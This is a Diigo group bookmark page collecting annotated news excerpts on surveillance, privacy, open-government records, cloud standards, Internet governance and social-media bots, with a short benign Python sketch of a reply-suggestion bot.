
Open Web: Group items tagged "responsive"


Paul Merrell

After Two Years, White House Finally Responds to Snowden Pardon Petition - With a "No" - 0 views

  • The White House on Tuesday ended two years of ignoring a hugely popular whitehouse.gov petition calling for NSA whistleblower Edward Snowden to be “immediately issued a full, free, and absolute pardon,” saying thanks for signing, but no. “We live in a dangerous world,” Lisa Monaco, President Obama’s adviser on homeland security and terrorism, said in a statement. More than 167,000 people signed the petition, which surpassed the 100,000 signatures that the White House’s “We the People” website said would garner a guaranteed response on June 24, 2013. In Tuesday’s response, the White House acknowledged that “This is an issue that many Americans feel strongly about.”
  • Monaco then explained her position: “Instead of constructively addressing these issues, Mr. Snowden’s dangerous decision to steal and disclose classified information had severe consequences for the security of our country and the people who work day in and day out to protect it.” Snowden didn’t actually disclose any classified information — news organizations including the Guardian, Washington Post, New York Times and The Intercept did the disclosing. And the Obama administration has yet to specify any “severe consequences” that can be independently confirmed.
  • ...1 more annotation...
  • The Snowden response was one of 20 responses to what the White House called “our We the People backlog.” The White House had been criticized for avoiding uncomfortable topics despite their popular support. On Twitter, the responses to the Snowden response, some from signers of the petition, were highly critical.
Paul Merrell

Google Wants to Write Your Social Media Messages For You - Search Engine Watch (#SEW) - 0 views

  • Overwhelmed by social media? Google may have patented a solution for you, in the form of software that mimics the types of responses you make to update messages on various social networks. The patent, by Ashish Bhatia representing Google, describes a comprehensive social media bot, providing suitable yet seemingly personalized responses on social media platforms. Essentially, the program analyzes the messages a user makes through social networks, email, text messaging, microblogging, and other systems. Then, the program offers suggestions for responses, where the original messages are displayed, with information about others' reactions to the same messages, and then the user can send the suggested messages in response to those users. The more the user utilizes the program and uses the responses, the more the bot can narrow down the types of responses you make. (A minimal code sketch of this suggestion loop appears at the end of this item.)
  •  
    Visions of endless conversations between different people's bots with no human participation. Then a human being reads a reply and files a libel lawsuit against the human whose bot posted the reply. Can the defendant obtain dismissal on the grounds that she did not write the message herself, her Google autoresponder did, and that if anyone is liable it is Google? Our Brave New (technological) World does and will pose many novel legal issues. My favorite so far: Assume that genetics have progressed to the point that, unknown to Bill Gates, someone steals a bit of his DNA and implants it in a mother-to-be's egg. Is Bill Gates as the biological father liable for child support? Is that child an heir to Bill Gates' fortune? The current state of law in the U.S. would suggest that the answer to both questions is almost certainly "yes." The child itself is blameless and Bill Gates is his biological father.
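
A minimal, hypothetical sketch of the suggestion loop the patent describes: index the replies a user has actually sent, then recommend the best-matching past reply for a new incoming message. The class name, word-overlap scoring, and sample messages below are invented for illustration and are not drawn from Google's patent or code.

```python
from collections import defaultdict


class ReplySuggester:
    """Toy model of a 'personalized response' bot: learn from past replies, suggest new ones."""

    def __init__(self):
        # Maps words seen in past incoming messages to the replies the user sent back.
        self.reply_index = defaultdict(list)

    def observe(self, incoming: str, users_reply: str) -> None:
        """Record how the user actually responded to a past message."""
        for word in incoming.lower().split():
            self.reply_index[word].append(users_reply)

    def suggest(self, incoming: str) -> str | None:
        """Suggest the past reply whose trigger words best overlap the new message."""
        scores = defaultdict(int)
        for word in incoming.lower().split():
            for reply in self.reply_index.get(word, []):
                scores[reply] += 1
        return max(scores, key=scores.get) if scores else None


bot = ReplySuggester()
bot.observe("Congrats on the new job!", "Thanks so much!")
bot.observe("Happy birthday!", "Thank you, appreciate it!")
print(bot.suggest("Congrats on the promotion!"))  # -> "Thanks so much!"
```

In the patent's terms, the more observed message/reply pairs the index accumulates, the more narrowly "personalized" the suggestions become.
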
Gary Edwards

Are the feds the first to a common cloud definition? | The Wisdom of Clouds - CNET News - 0 views

  •  
    Cisco's James Urquhart discusses the NIST definition of Cloud Computing. The National Institute of Standards and Technology is a non-regulatory branch of the Commerce Department and is responsible for much of the USA's official participation in World Standards organizations. This is an important discussion, but I'm a bit disappointed by the loose use of the term "network". I guess they mean the Internet? No mention of RESTful computing or Open Web Standards either. Some interesting clips: ...(The NIST's) definition of cloud computing will be the de facto standard definition that the entire US government will be given... In creating this definition, NIST consulted extensively with the private sector including a wide range of vendors, consultants and industry pundits including yours truly. Below is the draft NIST working definition of Cloud Computing. I should note, this definition is a work in progress and therefore is open to public ratification & comment. The initial feedback was very positive from the federal CIOs who were presented it yesterday in DC. Barring any last-minute lobbying I doubt we'll see many more major revisions. ....... Cloud computing is a pay-per-use model for enabling available, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model promotes availability and is comprised of five key characteristics, three delivery models, and four deployment models.
  •  
    Gary, NIST really is not "responsible for much of the USA's official participation in World Standards organizations." Lots of legal analysis omitted, but the bottom line is that NIST would have had to be delegated that responsibility by the President, but never was. However, that did not stop NIST from signing over virtually all responsibility for U.S. participation in international standard development to the private ANSI, without so much as a public notice and comment rulemaking process. See section 3 at http://ts.nist.gov/Standards/Conformity/ansimou.cfm. Absolutely illegal, including at least two bright-line violations of the U.S. Constitution. But the Feds have unmistakably abdicated their legal responsibilities in regard to international standards to the private sector.
Gary Edwards

How To Create A Responsive, Mobile First WordPress Theme - 0 views

  •  
    Excellent tutorial on creating a responsive, mobile-first WordPress theme.
Gary Edwards

Create a responsive wireframe | Tutorial | .net magazine - 0 views

  •  
    Nice tutorial on building a responsive wireframe using the open source "WireFly" framework.
Paul Merrell

Google Chrome Listening In To Your Room Shows The Importance Of Privacy Defense In Depth - 0 views

  • Yesterday, news broke that Google has been stealth downloading audio listeners onto every computer that runs Chrome, and transmits audio data back to Google. Effectively, this means that Google had taken itself the right to listen to every conversation in every room that runs Chrome somewhere, without any kind of consent from the people eavesdropped on. In official statements, Google shrugged off the practice with what amounts to “we can do that”. It looked like just another bug report. "When I start Chromium, it downloads something." Followed by strange status information that notably included the lines "Microphone: Yes" and "Audio Capture Allowed: Yes".
  • Without consent, Google’s code had downloaded a black box of code that – according to itself – had turned on the microphone and was actively listening to your room. A brief explanation of the Open-source / Free-software philosophy is needed here. When you’re installing a version of GNU/Linux like Debian or Ubuntu onto a fresh computer, thousands of really smart people have analyzed every line of human-readable source code before that operating system was built into computer-executable binary code, to make it common and open knowledge what the machine actually does instead of trusting corporate statements on what it’s supposed to be doing. Therefore, you don’t install black boxes onto a Debian or Ubuntu system; you use software repositories that have gone through this source-code audit-then-build process. Maintainers of operating systems like Debian and Ubuntu use many so-called “upstreams” of source code to build the final product. Chromium, the open-source version of Google Chrome, had abused its position as trusted upstream to insert lines of source code that bypassed this audit-then-build process, and which downloaded and installed a black box of unverifiable executable code directly onto computers, essentially rendering them compromised. We don’t know and can’t know what this black box does. But we see reports that the microphone has been activated, and that Chromium considers audio capture permitted.
  • This was supposedly to enable the “Ok, Google” behavior – that when you say certain words, a search function is activated. Certainly a useful feature. Certainly something that enables eavesdropping of every conversation in the entire room, too. Obviously, your own computer isn’t the one to analyze the actual search command. Google’s servers do. Which means that your computer had been stealth configured to send what was being said in your room to somebody else, to a private company in another country, without your consent or knowledge, an audio transmission triggered by… an unknown and unverifiable set of conditions. Google had two responses to this. The first was to introduce a practically-undocumented switch to opt out of this behavior, which is not a fix: the default install will still wiretap your room without your consent, unless you opt out, and more importantly, know that you need to opt out, which is nowhere a reasonable requirement. But the second was more of an official statement following technical discussions on Hacker News and other places. That official statement amounted to three parts (paraphrased, of course):
  • ...4 more annotations...
  • Of course, people were quick to downplay the alarm. “It only listens when you say ‘Ok, Google’.” (Ok, so how does it know to start listening just before I’m about to say ‘Ok, Google?’) “It’s no big deal.” (A company stealth installs an audio listener that listens to every room in the world it can, and transmits audio data to the mothership when it encounters an unknown, possibly individually tailored, list of keywords – and it’s no big deal!?) “You can opt out. It’s in the Terms of Service.” (No. Just no. This is not something that is the slightest amount of permissible just because it’s hidden in legalese.) “It’s opt-in. It won’t really listen unless you check that box.” (Perhaps. We don’t know, Google just downloaded a black box onto my computer. And it may not be the same black box as was downloaded onto yours.) Early last decade, privacy activists practically yelled and screamed that the NSA’s taps of various points of the Internet and telecom networks had the technical potential for enormous abuse against privacy. Everybody else dismissed those points as basically tinfoilhattery – until the Snowden files came out, and it was revealed that precisely everybody involved had abused their technical capability for invasion of privacy as far as was possible. Perhaps it would be wise to not repeat that exact mistake. Nobody, and I really mean nobody, is to be trusted with a technical capability to listen to every room in the world, with listening profiles customizable at the identified-individual level, on the mere basis of “trust us”.
  • If you think this is an excusable and responsible statement, raise your hand now. Now, it should be noted that this was Chromium, the open-source version of Chrome. If somebody downloads the Google product Google Chrome, as in the prepackaged binary, you don’t even get a theoretical choice. You’re already downloading a black box from a vendor. In Google Chrome, this is all included from the start. This episode highlights the need for hard, not soft, switches to all devices – webcams, microphones – that can be used for surveillance. A software on/off switch for a webcam is no longer enough, a hard shield in front of the lens is required. A software on/off switch for a microphone is no longer enough, a physical switch that breaks its electrical connection is required. That’s how you defend against this in depth.
  • 1) Yes, we’re downloading and installing a wiretapping black-box to your computer. But we’re not actually activating it. We did take advantage of our position as trusted upstream to stealth-insert code into open-source software that installed this black box onto millions of computers, but we would never abuse the same trust in the same way to insert code that activates the eavesdropping-blackbox we already downloaded and installed onto your computer without your consent or knowledge. You can look at the code as it looks right now to see that the code doesn’t do this right now. 2) Yes, Chromium is bypassing the entire source code auditing process by downloading a pre-built black box onto people’s computers. But that’s not something we care about, really. We’re concerned with building Google Chrome, the product from Google. As part of that, we provide the source code for others to package if they like. Anybody who uses our code for their own purpose takes responsibility for it. When this happens in a Debian installation, it is not Google Chrome’s behavior, this is Debian Chromium’s behavior. It’s Debian’s responsibility entirely. 3) Yes, we deliberately hid this listening module from the users, but that’s because we consider this behavior to be part of the basic Google Chrome experience. We don’t want to show all modules that we install ourselves.
  • Privacy remains your own responsibility.
  •  
    And of course, Google would never succumb to a subpoena requiring it to turn over the audio stream to the NSA. The Tor Browser just keeps looking better and better. https://www.torproject.org/projects/torbrowser.html.en
Paul Merrell

Facebook in talks with US watchdog to settle privacy investigation | Financial Times - 0 views

  • Facebook is in early talks with the US Federal Trade Commission over settling an investigation into privacy violations that could result in a record fine for the technology company, according to several people familiar with the situation. The US watchdog is investigating whether the social network broke a consent order that it signed with the FTC in 2011, which required it to be clear with users about how their data were being shared with third parties. According to two people familiar with the talks, negotiations over a settlement have started although no monetary figure has been agreed. The FTC opened its investigation into the social network’s privacy practices in March last year following the Cambridge Analytica scandal, in which the data of 87m users was improperly accessed by a third party. David Vladeck, a former FTC director who oversaw the 2011 agreement with Facebook, said he expected a major financial penalty. “I think it’s highly unlikely the FTC would impose a civil penalty under a billion dollars,” he said.
Gary Edwards

Leahy scuttles his warrantless e-mail surveillance bill | Politics and Law - CNET News - 0 views

  •  
    Many thanks to FreedomWorks and the Center for Democracy and Technology for the fine work they did in opposing this tyranny of our government trying to take over the Internet. excerpt: "Sen. Patrick Leahy has abandoned his controversial proposal that would grant government agencies more surveillance power -- including warrantless access to Americans' e-mail accounts -- than they possess under current law. The Vermont Democrat said today on Twitter that he would "not support such an exception" for warrantless access. The remarks came a few hours after a CNET article was published this morning that disclosed the existence of the measure. A vote on the proposal in the Senate Judiciary committee, which Leahy chairs, is scheduled for next Thursday. The amendments were due to be glued onto a substitute (PDF) to H.R. 2471, which the House of Representatives already has approved. Leahy's about-face comes in response to a deluge of criticism today, including the American Civil Liberties Union saying that warrants should be required, and the conservative group FreedomWorks launching a petition to Congress -- with more than 2,300 messages sent so far -- titled: "Tell Congress: Stay Out of My Email!" A spokesman for the senator did not respond to questions today from CNET asking for clarification of what Leahy would support next week. (We'll update this article if we receive a response.) A Democratic aide to the Judiciary committee did, however, tell CNET this afternoon that Leahy does not support broad exceptions for warrantless searches of e-mail content. A note from Leahy's Twitter account added: "Technology has created vacuum in privacy protection. Sen. Leahy believes that needs to be fixed, and #ECPA needs privacy updates." That's a reference to the 1986 Electronic Communications Privacy Act, which currently does not require that police always obtain a warrant for the contents of e-mail and other communications. This revised position will come as a relief to privacy
Gary Edwards

You Are (Probably) Wrong About You - 0 views

  •  
    When you fail to reach a goal - say, for instance, you give an important presentation and it doesn't go well - you become the detective (once again, largely unconsciously). You gather up the usual suspects to see who is responsible for your failure: lack of innate ability, lack of effort, poor preparation, using the wrong strategy, bad luck, etc. Of all of these possible culprits, it's lack of innate ability we most frequently hold responsible, like the much-maligned butler in an Agatha Christie novel. In Western countries - and nowhere more so than in the U.S. - innate ability is the go-to explanation for all of our successes and our failures. The problem is that the evidence - the kind gathered by scientists over the last thirty years of study of motivation and achievement - suggests that innate ability is rarely to blame for either succeeding or falling short. (If you've blamed your poor performances in the past on a lack of ability, don't feel bad. We've all done it. The butler seems guilty. Just please don't do it anymore.) If we are going to ever improve performance, we need to place blame where it belongs. We need solid evidence about where we went wrong. Unfortunately, that's the kind of evidence that usually doesn't make it to our consciousness on its own, making self-diagnosis practically impossible. We need help getting the right answers.
Paul Merrell

Most Agencies Falling Short on Mandate for Online Records - 0 views

  • Nearly 20 years after Congress passed the Electronic Freedom of Information Act Amendments (E-FOIA), only 40 percent of agencies have followed the law's instruction for systematic posting of records released through FOIA in their electronic reading rooms, according to a new FOIA Audit released today by the National Security Archive at www.nsarchive.org to mark Sunshine Week. The Archive team audited all federal agencies with Chief FOIA Officers as well as agency components that handle more than 500 FOIA requests a year — 165 federal offices in all — and found only 67 with online libraries populated with significant numbers of released FOIA documents and regularly updated.
  • Congress called on agencies to embrace disclosure and the digital era nearly two decades ago, with the passage of the 1996 "E-FOIA" amendments. The law mandated that agencies post key sets of records online, provide citizens with detailed guidance on making FOIA requests, and use new information technology to post online proactively records of significant public interest, including those already processed in response to FOIA requests and "likely to become the subject of subsequent requests." Congress believed then, and openness advocates know now, that this kind of proactive disclosure, publishing online the results of FOIA requests as well as agency records that might be requested in the future, is the only tenable solution to FOIA backlogs and delays. Thus the National Security Archive chose to focus on the e-reading rooms of agencies in its latest audit. Even though the majority of federal agencies have not yet embraced proactive disclosure of their FOIA releases, the Archive E-FOIA Audit did find that some real "E-Stars" exist within the federal government, serving as examples to lagging agencies that technology can be harnessed to create state-of-the art FOIA platforms. Unfortunately, our audit also found "E-Delinquents" whose abysmal web performance recalls the teletype era.
  • E-Delinquents include the Office of Science and Technology Policy at the White House, which, despite being mandated to advise the President on technology policy, does not embrace 21st century practices by posting any frequently requested records online. Another E-Delinquent, the Drug Enforcement Administration, insults its website's viewers by claiming that it "does not maintain records appropriate for FOIA Library at this time."
  • ...9 more annotations...
  • "The presumption of openness requires the presumption of posting," said Archive director Tom Blanton. "For the new generation, if it's not online, it does not exist." The National Security Archive has conducted fourteen FOIA Audits since 2002. Modeled after the California Sunshine Survey and subsequent state "FOI Audits," the Archive's FOIA Audits use open-government laws to test whether or not agencies are obeying those same laws. Recommendations from previous Archive FOIA Audits have led directly to laws and executive orders which have: set explicit customer service guidelines, mandated FOIA backlog reduction, assigned individualized FOIA tracking numbers, forced agencies to report the average number of days needed to process requests, and revealed the (often embarrassing) ages of the oldest pending FOIA requests. The surveys include:
  • The federal government has made some progress moving into the digital era. The National Security Archive's last E-FOIA Audit in 2007, " File Not Found," reported that only one in five federal agencies had put online all of the specific requirements mentioned in the E-FOIA amendments, such as guidance on making requests, contact information, and processing regulations. The new E-FOIA Audit finds the number of agencies that have checked those boxes is now much higher — 100 out of 165 — though many (66 in 165) have posted just the bare minimum, especially when posting FOIA responses. An additional 33 agencies even now do not post these types of records at all, clearly thwarting the law's intent.
  • The FOIAonline Members (Department of Commerce, Environmental Protection Agency, Federal Labor Relations Authority, Merit Systems Protection Board, National Archives and Records Administration, Pension Benefit Guaranty Corporation, Department of the Navy, General Services Administration, Small Business Administration, U.S. Citizenship and Immigration Services, and Federal Communications Commission) won their "E-Star" by making past requests and releases searchable via FOIAonline. FOIAonline also allows users to submit their FOIA requests digitally.
  • THE E-DELINQUENTS: WORST OVERALL AGENCIES (in alphabetical order)
  • Key Findings
  • Excuses Agencies Give for Poor E-Performance
  • Justice Department guidance undermines the statute. Currently, the FOIA stipulates that documents "likely to become the subject of subsequent requests" must be posted by agencies somewhere in their electronic reading rooms. The Department of Justice's Office of Information Policy defines these records as "frequently requested records… or those which have been released three or more times to FOIA requesters." Of course, it is time-consuming for agencies to develop a system that keeps track of how often a record has been released, which is in part why agencies rarely do so and are often in breach of the law. Troublingly, both the current House and Senate FOIA bills include language that codifies the instructions from the Department of Justice. The National Security Archive believes the addition of this "three or more times" language actually harms the intent of the Freedom of Information Act as it will give agencies an easy excuse ("not requested three times yet!") not to proactively post documents that agency FOIA offices have already spent time, money, and energy processing. We have formally suggested alternate language requiring that agencies generally post "all records, regardless of form or format that have been released in response to a FOIA request."
  • Disabilities Compliance. Despite the E-FOIA Act, many government agencies do not embrace the idea of posting their FOIA responses online. The most common reason agencies give is that it is difficult to post documents in a format that complies with the Americans with Disabilities Act, also referred to as being "508 compliant," and the 1998 Amendments to the Rehabilitation Act that require federal agencies "to make their electronic and information technology (EIT) accessible to people with disabilities." E-Star agencies, however, have proven that 508 compliance is no barrier when the agency has a will to post. All documents posted on FOIAonline are 508 compliant, as are the documents posted by the Department of Defense and the Department of State. In fact, every document created electronically by the US government after 1998 should already be 508 compliant. Even old paper records that are scanned to be processed through FOIA can be made 508 compliant with just a few clicks in Adobe Acrobat, according to this Department of Homeland Security guide (essentially OCRing the text, and including information about where non-textual fields appear). Even if agencies are insistent it is too difficult to OCR older documents that were scanned from paper, they cannot use that excuse with digital records.
  • Privacy. Another commonly articulated concern about posting FOIA releases online is that doing so could inadvertently disclose private information from "first person" FOIA requests. This is a valid concern, and this subset of FOIA requests should not be posted online. (The Justice Department identified "first party" requester rights in 1989. Essentially agencies cannot use the b(6) privacy exemption to redact information if a person requests it for him or herself. An example of a "first person" FOIA would be a person's request for his own immigration file.) Cost and Waste of Resources. There is also a belief that there is little public interest in the majority of FOIA requests processed, and hence it is a waste of resources to post them. This thinking runs counter to the governing principle of the Freedom of Information Act: that government information belongs to US citizens, not US agencies. As such, the reason that a person requests information is immaterial as the agency processes the request; the "interest factor" of a document should also be immaterial when an agency is required to post it online. Some think that posting FOIA releases online is not cost effective. In fact, the opposite is true. It's not cost effective to spend tens (or hundreds) of person hours to search for, review, and redact FOIA requests only to mail it to the requester and have them slip it into their desk drawer and forget about it. That is a waste of resources. The released document should be posted online for any interested party to utilize. This will only become easier as FOIA processing systems evolve to automatically post the documents they track. The State Department earned its "E-Star" status demonstrating this very principle, and spent no new funds and did not hire contractors to build its Electronic Reading Room, instead it built a self-sustaining platform that will save the agency time and money going forward.
Paul Merrell

EFF Pries More Information on Zero Days from the Government's Grasp | Electronic Fronti... - 0 views

  • Until just last week, the U.S. government kept up the charade that its use of a stockpile of security vulnerabilities for hacking was a closely held secret. In fact, in response to EFF’s FOIA suit to get access to the official U.S. policy on zero days, the government redacted every single reference to “offensive” use of vulnerabilities. To add insult to injury, the government’s claim was that even admitting to offensive use would cause damage to national security. Now, in the face of EFF’s brief marshaling overwhelming evidence to the contrary, the charade is over. In response to EFF’s motion for summary judgment, the government has disclosed a new version of the Vulnerabilities Equities Process, minus many of the worst redactions. First and foremost, it now admits that the “discovery of vulnerabilities in commercial information technology may present competing ‘equities’ for the [government’s] offensive and defensive mission.” That might seem painfully obvious—a flaw or backdoor in a Juniper router is dangerous for anyone running a network, whether that network is in the U.S. or Iran. But the government’s failure to adequately weigh these “competing equities” was so severe that in 2013 a group of experts appointed by President Obama recommended that the policy favor disclosure “in almost all instances for widely used code.” [.pdf].
  • The newly disclosed version of the Vulnerabilities Equities Process (VEP) also officially confirms what everyone already knew: the use of zero days isn’t confined to the spies. Rather, the policy states that the “law enforcement community may want to use information pertaining to a vulnerability for similar offensive or defensive purposes but for the ultimate end of law enforcement.” Similarly it explains that “counterintelligence equities can be defensive, offensive, and/or law enforcement-related” and may “also have prosecutorial responsibilities.” Given that the government is currently prosecuting users for committing crimes over Tor hidden services, and that it identified these individuals using vulnerabilities called a “Network Investigative Technique”, this too doesn’t exactly come as a shocker. Just a few weeks ago, the government swore that even acknowledging the mere fact that it uses vulnerabilities offensively “could be expected to cause serious damage to the national security.” That’s a standard move in FOIA cases involving classified information, even though the government unnecessarily classifies documents at an astounding rate. In this case, the government relented only after nearly a year and a half of litigation by EFF. The government would be well advised to stop relying on such weak secrecy claims—it only risks undermining its own credibility.
  • The new version of the VEP also reveals significantly more information about the general process the government follows when a vulnerability is identified. In a nutshell, an agency that discovers a zero day is responsible for invoking the VEP, which then provides for centralized coordination and weighing of equities among all affected agencies. Along with a declaration from an official at the Office of the Director of National Intelligence, this new information provides more background on the reasons why the government decided to develop an overarching zero day policy in the first place: it “recognized that not all organizations see the entire picture of vulnerabilities, and each organization may have its own equities and concerns regarding the prioritization of patches and fixes, as well as its own distinct mission obligations.” We now know the VEP was finalized in February 2010, but the government apparently failed to implement it in any substantial way, prompting the presidential review group’s recommendation to prioritize disclosure over offensive hacking. We’re glad to have forced a little more transparency on this important issue, but the government is still foolishly holding on to a few last redactions, including refusing to name which agencies participate in the VEP. That’s just not supportable, and we’ll be in court next month to argue that the names of these agencies must be disclosed. 
Paul Merrell

Hey ITU Member States: No More Secrecy, Release the Treaty Proposals | Electronic Front... - 0 views

  • ...4 more comments...
  •  
    The International Telecommunication Union (ITU) will hold the World Conference on International Telecommunications (WCIT-12) in December in Dubai, an all-important treaty-writing event where ITU Member States will discuss the proposed revisions to the International Telecommunication Regulations (ITR). The ITU is a United Nations agency responsible for international telecom regulation, a bureaucratic, slow-moving, closed regulatory organization that issues treaty-level provisions for international telecommunication networks and services. The ITR, a legally binding international treaty signed by 178 countries, defines the boundaries of ITU's regulatory authority and provides "general principles" on international telecommunications. However, media reports indicate that some proposed amendments to the ITR - a negotiation that is already well underway - could potentially expand the ITU's mandate to encompass the Internet.
  •  
    The ITU Member States should urgently lift restrictions on sharing the preparatory materials and ITR amendments, and release the documents. The current preparatory process lacks the transparency, openness of process, and inclusiveness of all relevant stakeholders that is the hallmark of Internet policy-making. A truly multi-stakeholder participation model requires equal footing for all relevant stakeholders, including civil society, the private sector, the technical community, and participating governments. These principles are the minimum that one could expect following commitments made at the World Summit on the Information Society (WSIS). The ITU Secretary-General Dr. Hamadoun I. Touré reiterated these commitments last year at the Internet Governance Forum in Kenya: In its own words, the "ITU remains firmly committed to the WSIS process," and it considers itself to have "made considerable progress in many areas in advancing the implementation of the WSIS outcomes." And in practice? Not likely. This is why EFF, European Digital Rights, CIPPIC and CDT and a coalition of civil society organizations from around the world are demanding that the ITU Secretary General, the WCIT-12 Council Working Group, and ITU Member States open up the WCIT-12 and the Council working group negotiations, by immediately releasing all the preparatory materials and Treaty proposals. If it affects the digital rights of citizens across the globe, the public needs to know what is going on and deserves to have a say. The Council Working Group is responsible for the preparatory work towards WCIT-12, setting the agenda for and consolidating input from participating governments and Sector Members.
  •  
    We demand full and meaningful participation for civil society in its own right, and without cost, at the Council Working Group meetings and the WCIT on equal footing with all other stakeholders, including participating governments. A transparent, open process that is inclusive of civil society at every stage is crucial to creating sound policy. Respect the multi-stakeholder process: Civil society has good reason to be concerned regarding an expanded ITU policy-making role. To begin with, the institution does not appear to have high regard for the distributed multi-stakeholder decision making model that has been integral to the development of an innovative, successful and open Internet. In spite of commitments at WSIS to ensure Internet policy is based on input from all relevant stakeholders, the ITU has consistently put the interests of one stakeholder - Governments - above all others. This is discouraging, as some government interests are inconsistent with an open, innovative network. Indeed, the conditions which have made the Internet the powerful tool it is today emerged in an environment where the interests of all stakeholders are given equal footing, and existing Internet policy-making institutions at least aspire, with varying success, to emulate this equal footing. This formula is enshrined in the Tunis Agenda, which was committed to at WSIS in 2005:
  •  
    83. Building an inclusive development-oriented Information Society will require unremitting multi-stakeholder effort. We thus commit ourselves to remain fully engaged - nationally, regionally and internationally - to ensure sustainable implementation and follow-up of the outcomes and commitments reached during the WSIS process and its Geneva and Tunis phases of the Summit. Taking into account the multifaceted nature of building the Information Society, effective cooperation among governments, private sector, civil society and the United Nations and other international organizations, according to their different roles and responsibilities and leveraging on their expertise, is essential. 84. Governments and other stakeholders should identify those areas where further effort and resources are required, and jointly identify, and where appropriate develop, implementation strategies, mechanisms and processes for WSIS outcomes at international, regional, national and local levels, paying particular attention to people and groups that are still marginalized in their access to, and utilization of, ICTs.
  •  
    Indeed, the ITU's current vision of Internet policy-making is less one of distributed decision-making, and more one of 'taking control.' For example, in an interview conducted last June with ITU Secretary General Hamadoun Touré, Russian Prime Minister Vladimir Putin raised the suggestion that the union might take control of the Internet: "We are thankful to you for the ideas that you have proposed for discussion," Putin told Touré in that conversation. "One of them is establishing international control over the Internet using the monitoring and supervisory capabilities of the International Telecommunication Union (ITU)." Rights to online expression are unlikely to fare much better than privacy under an ITU model. During last year's IGF in Kenya, a voluntary code of conduct was issued to further restrict free expression online. A group of nations (including China, the Russian Federation, Tajikistan and Uzbekistan) released a Resolution for the UN General Assembly titled, "International Code of Conduct for Information Security." The Code seems to be designed to preserve and protect national powers in information and communication. In it, governments pledge to curb "the dissemination of information that incites terrorism, secessionism or extremism or that undermines other countries' political, economic and social stability, as well as their spiritual and cultural environment." This overly broad provision accords any state the right to censor or block international communications, for almost any reason.
  •  
    We urge the ITU Secretary General et al to ensure that the outcomes of the WCIT and its preparatory process truly represent the common interests of all who hold a stake in the future of our information society. If your government is a member of ITU, demand transparency and tell them to open the process and disclose the WCIT preparatory documents and Treaty amendments.
Gary Edwards

Office Productivity Software Is No Closer To Becoming A Commodity | Forrester Blogs - 0 views

  • We just published a report on the state of adoption of Office 2013 And Productivity Suite Alternatives based on a survey of 155 Forrester clients with responsibility for those investments. The sample does not fully represent the market, but lets us draw comparisons to the results of our previous survey in 2011. Some key takeaways from the data:   One in five firms uses email in the cloud. Another quarter plans to move at some point. More are using Office 365 (14%) than Google Apps (9%).  Just 22% of respondents are on Office 2013. Another 36% have plans to be on it. Office 2013's uptake will be slower than Office 2010 because fewer firms plan to combine the rollout of Office 2013 with Windows 8 as they combined Office 2010 with Windows 7. Alternatives to Microsoft Office show little traction. In 2011, 13% of respondents supported open source alternatives to Office. This year the number is just 5%. Google Docs has slightly higher adoption and is in use at 13% of companies. 
  • Microsoft continues to have a stranglehold on office productivity in the enterprise: Just 6% of companies in our survey give all or some employees an alternative instead of the installed version of Microsoft Office. Most surprising of all, multi-platform support is NOT a priority. Apps on iOS and Android devices were important to 16% of respondents, and support for non-Windows PCs was important to only 11%. For now, most technology decision-makers seem satisfied with leaving employees to self-provision office productivity apps on their smartphones and tablets if they really want them. 
  • Do you think we're getting closer to replacing Microsoft Office in the workplace?
  •  
    "We (Forrester) just published a report on the state of adoption of Office 2013 And Productivity Suite Alternatives based on a survey of 155 Forrester clients with responsibility for those investments. The sample does not fully represent the market, but lets us draw comparisons to the results of our previous survey in 2011. Some key takeaways from the data:   One in five firms uses email in the cloud. Another quarter plans to move at some point. More are using Office 365 (14%) than Google Apps (9%).  Just 22% of respondents are on Office 2013. Another 36% have plans to be on it. Office 2013's uptake will be slower than Office 2010 because fewer firms plan to combine the rollout of Office 2013 with Windows 8 as they combined Office 2010 with Windows 7. Alternatives to Microsoft Office show little traction. In 2011, 13% of respondents supported open source alternatives to Office. This year the number is just 5%. Google Docs has slightly higher adoption and is in use at 13% of companies. "
Paul Merrell

Information Warfare: Automated Propaganda and Social Media Bots | Global Research - 0 views

  • NATO has announced that it is launching an “information war” against Russia. The UK publicly announced a battalion of keyboard warriors to spread disinformation. It’s well-documented that the West has long used false propaganda to sway public opinion. Western military and intelligence services manipulate social media to counter criticism of Western policies. Such manipulation includes flooding social media with comments supporting the government and large corporations, using armies of sock puppets, i.e. fake social media identities. See this, this, this, this and this. In 2013, the American Congress repealed the formal ban against the deployment of propaganda against U.S. citizens living on American soil. So there’s even less to constrain propaganda than before.
  • Information warfare for propaganda purposes also includes: The Pentagon, Federal Reserve and other government entities using software to track discussion of political issues … to try to nip dissent in the bud before it goes viral; “Controlling, infiltrating, manipulating and warping” online discourse; and the use of artificial intelligence programs to try to predict how people will react to propaganda.
  • Some of the propaganda is spread by software programs. We pointed out 6 years ago that people were writing scripts to censor hard-hitting information from social media. One of America’s top cyber-propagandists – former high-level military information officer Joel Harding – wrote in December: I was in a discussion today about information being used in social media as a possible weapon.  The people I was talking with have a tool which scrapes social media sites, gauges their sentiment and gives the user the opportunity to automatically generate a persuasive response. Their tool is called a “Social Networking Influence Engine”. *** The implications seem to be profound for the information environment. *** The people who own this tool are in the civilian world and don’t even remotely touch the defense sector, so getting approval from the US Department of State might not even occur to them.
  • ...2 more annotations...
  • How Can This Be Real? Gizmodo reported in 2010: Software developer Nigel Leck got tired of rehashing the same 140-character arguments against climate change deniers, so he programmed a bot that does the work for him. With citations! Leck’s bot, @AI_AGW, doesn’t just respond to arguments directed at Leck himself, it goes out and picks fights. Every five minutes it trawls Twitter for terms and phrases that commonly crop up in Tweets that refute human-caused climate change. It then searches its database of hundreds to find a counter-argument best suited for that tweet—usually a quick statement and a link to a scientific source. As can be the case with these sorts of things, many of the deniers don’t know they’ve been targeted by a robot and engage AI_AGW in debate. The bot will continue to fire back canned responses that best fit the interlocutor’s line of debate—Leck says this goes on for days, in some cases—and the bot’s been outfitted with a number of responses on the topic of religion, where the arguments unsurprisingly often end up. Technology has come a long way in the past 5 years. So if a lone programmer could do this 5 years ago, imagine what he could do now. And the big players have a lot more resources at their disposal than a lone climate activist/software developer does. For example, a government expert told the Washington Post that the government “quite literally can watch your ideas form as you type” (and see this). So if the lone programmer is doing it, it’s not unreasonable to assume that the big boys are widely doing it. (A minimal code sketch of this trigger-and-reply pattern appears at the end of this item.)
